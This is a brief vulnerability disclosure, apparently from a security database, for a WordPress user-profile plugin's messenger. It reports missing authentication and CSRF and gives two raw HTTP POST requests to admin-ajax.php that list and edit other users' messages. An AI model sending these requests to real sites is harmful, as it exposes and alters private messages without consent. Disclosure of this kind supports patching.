The plugin was affected by Broken Access Control and Cross-Site Request Forgery (CSRF) vulnerabilities.

The plugin creates a frontend user profile, groups, communities and messenger. However, the messenger is vulnerable because there is no user authentication, so the vulnerability allows us to list and modify other users’ messages.

Proof of Concept

To list other users’ messages:

POST /vdb/metagauss-profilegrid/wp-admin/admin-ajax.php HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

action=pm_messenger_show_messages&tid=1

To edit another user’s message:

POST /vdb/metagauss-profilegrid/wp-admin/admin-ajax.php HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

action=pm_messenger_send_new_message&tid=1&rid=-&mid=1&content=message1%20from%20user1%20to%20user2%20(edited%20by%20spy)&_wpnonce=b5faed947c